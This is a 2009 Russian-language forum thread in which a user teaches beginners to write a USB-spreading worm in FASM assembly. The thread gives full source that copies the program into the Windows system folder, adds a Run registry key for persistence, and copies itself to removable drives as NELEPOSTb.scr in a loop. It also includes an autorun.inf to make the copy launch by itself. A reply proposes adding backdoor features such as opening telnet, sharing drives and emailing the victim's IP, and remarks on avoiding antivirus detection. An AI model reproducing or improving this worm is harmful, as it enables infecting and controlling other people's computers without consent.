Пишем простой вирус на fasm (для новичков), Вирус который копирует себя на флеш носители Опции

[white_hat]

Пришел домой с вечера и захотелось написать что нибудь простенькое,но возможно полезненькое для только начинающих кодеров на фасме. Писать буду на fasm ver 1.67.14 ( я хз мб в других версиях что нить сменили).
Вирус очень простой(для новичков), так что прошу продвинутых the кул хацкеров =) не кричать.
Что он будет делать?
Да все просто:
1. Поиск системной папки и проверка, не с нее ли мы работаем,если нет то копируем себя туда пот названием lame.exe (название пишите какое хотите,например если бы он назывался csrss.exe то винда бы не дала его просто так закрыть)
2. Запись в системный реестр. О да мы тупо пишем сябя в ран ветку ..куда пишутся все такие же говно вирусы и трояны (но если пишется что то серьезное, писать туда свое творение никто не станет)
3. Скан драйвов и если флешка то копируем туда вирус (отфильтровываем флупики,жесткие и сд ромы)
В вирусе нету различных проверок,поэтому будут встречаться ошибки при пустых флешках (в моем мп3 плеере когда пуст слот для дополнительной флешки она все равно отображается..и он палится при попытке в нее скопировать)
Вирус никаких деструктивных действий не делает! Да и не нужно, мы ведь только учимся

Код

;++++++++++++++VIRUS NELEPOSTb++++++++++++++++++++++
;===========Code was writed by White================
format pe gui
entry start;точка входа в программу начинается с метки start
include 'win32a.inc'
section '.code' code readable writeable executable
proc regedit            ;прописываемся в реестр
invoke RegCreateKeyEx,HKEY_LOCAL_MACHINE,_key,0,0,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCES
S,0,handle,0
invoke lstrlen,_sys1
invoke RegSetValueEx,[handle],_key2,0,REG_SZ,_sys1,eax
ret
endp
proc infect_flash            ;инфицирование флэшек
invoke GetLogicalDriveStrings,128,_drmass

mov ebx,_drmass
@back2:
mov dl,byte[ebx]
mov [_drive],dl
invoke lstrcmpi,_drive,_floppy;если флупик то пропускаем
or eax,eax
jz @next
invoke GetDriveType,_drive
cmp eax,DRIVE_REMOVABLE
jne @next            ;если не флешка то переходим к следующему

invoke lstrcpy,_path,_drive
invoke lstrcat,_path,_name2
invoke CopyFile,_file,_path,0
@next:
add ebx,4
cmp byte[ebx],0    ;если диски закончились тогда выходим,если нет то прыгаем на @back2 метку
jne @back2
ret
endp

proc infect_system;инфицирование системы
invoke lstrcmpi,_sys1,_file
or eax,eax
jz @back
invoke CopyFile,_file,_sys1,0
@back:
ret
endp

start:                                    ;старт основного кода программы
invoke GetSystemDirectory,_sys1,128
invoke GetModuleFileName, 0, _file, 128
invoke lstrcat,_sys1,_name1
call infect_system

;бесконечный цикл
;------------------------------------------
loop1:                            
call regedit                            
call infect_flash            ;пушим в cтек количество милисекунд слипа
push 4000                    ;для меньшей загрузки проца и спама флэшек
call [Sleep]                            
jmp loop1                            
;------------------------------------------
invoke ExitProcess,0

section '.idata' import data readable writeable;импортируемые api функции и библиотеки их содержащие
library kernel,'KERNEL32.DLL',\
       advapi,'ADVAPI32.DLL'


import kernel,\
      lstrcmpi,'lstrcmpiA',\
      lstrcpy,'lstrcpyA',\
      lstrcat,'lstrcatA',\
      lstrlen,'lstrlenA',\
      CopyFile,'CopyFileA',\
      Sleep,'Sleep',\
      GetSystemDirectory,'GetSystemDirectoryA',\
      GetModuleFileName,'GetModuleFileNameA',\
      GetLogicalDriveStrings, 'GetLogicalDriveStringsA',\
      GetDriveType,'GetDriveTypeA',\
      ExitProcess,'ExitProcess'
import advapi,\
      RegCreateKeyEx,'RegCreateKeyExA',\
      RegSetValueEx,'RegSetValueExA'


_key db 'Software\Microsoft\Windows\CurrentVersion\Run',0
_name1 db '\lame.exe',0
_key2 db 'dont_kill_me_plz',0;название ключа
_name2 db 'NELEPOSTb.scr',0
_floppy db 'a:\',0;нужна для проверки на флуппик
_drive db ?, ':\',0
handle dd ?
_sys1 db 128 dup (?);c:\windows\lame.exe
_file db 128 dup (?);путь к нашему ехе файлу
_drmass db 128 dup (?);массив с строкой драйвов
_path db 128 dup (?)

Как не трудно заметить секция данных совмещена с секцией импорта что позволило уменьшить pe файл на 500 байт
Те кто хотят что бы при заходе на флешку (при autorun=1) вирус сам запускался, могут добавить свой код на создание файла autorun.inf на флешке (пусть это будет домашнее задание)

А сам текст файла autorun.inf в простейшем варианте выглядит так:

Код

[AUTORUN]
Shellexecute=NELEPOSTb.scr

Фасм постараюсь залить что бы вы не искали.
Если что не понятно, пишите постараюсь ответить. с ув. White

[GivioN]

Было бы отлично если бы выложил сам компилятор fasm, так же наверно не плохо бы добавить какий-нибуть фишки бекдора, ну там телнет открыть или диски расшарить, так же письмецо на мыло скинуть, что бы IP спалить.
А в целом для новичков само то, тем более если код писал сам, авером откомпилированный продукт наверно не палится)))

[white_hat]

Вот сам компилятор с редактором и некоторые обучающие статьи в архивах(на енглише по фасму и масму)
]]>Fasm 1.67.14]]>
В файле FASMW.INI пропишите путь к INCLUDE папке.

Код

[Environment]
include=c:\fleshka2\fasm\INCLUDE

измените эту строчку на ту где у вас находится фасм (т.е вместо c:\fleshka2\fasm\INCLUDE напишите- c:\Ваш путь\fasm\include
Данный код вируса дописывать и улучшать не буду, т.к это противоречит законам РБ

Сообщение отредактировал white_hat - 25.7.2009, 22:33

[danila]

а какой программой пишутся вирусы?

[PRStudio]

а какой программой пишутся вирусы?

Подозреваю что не в Паинте.
------
Определенностей нет. Он пишется фактически на чем угодно.
Выбираешь себе один из многочисленных языков программирования и пишешь себе что угодно. (очень внимательный юзер наверняка заметил, что к теме прикреплен опрос, в котором перечислены основные языки программирования)

Т.е. зайдя в эту тему, прежде чем задавать вопросы, я бы рекомендовал читать главный пост, которому, и посвящена данная тема. Из поста мы выясняем, что вирус написан на языке Fasm, в среде разработки fasm ver 1.67.14. Все это мы узнали всего из первых 3-х строк. Далее, не поленившись почитать остальные два огромных поста, обнаруживаем, что white_hat еще и выложил эту программу. Вывод - прежде чем искать нужную тебе информацию, убедись, что у тебя нет ее перед носом.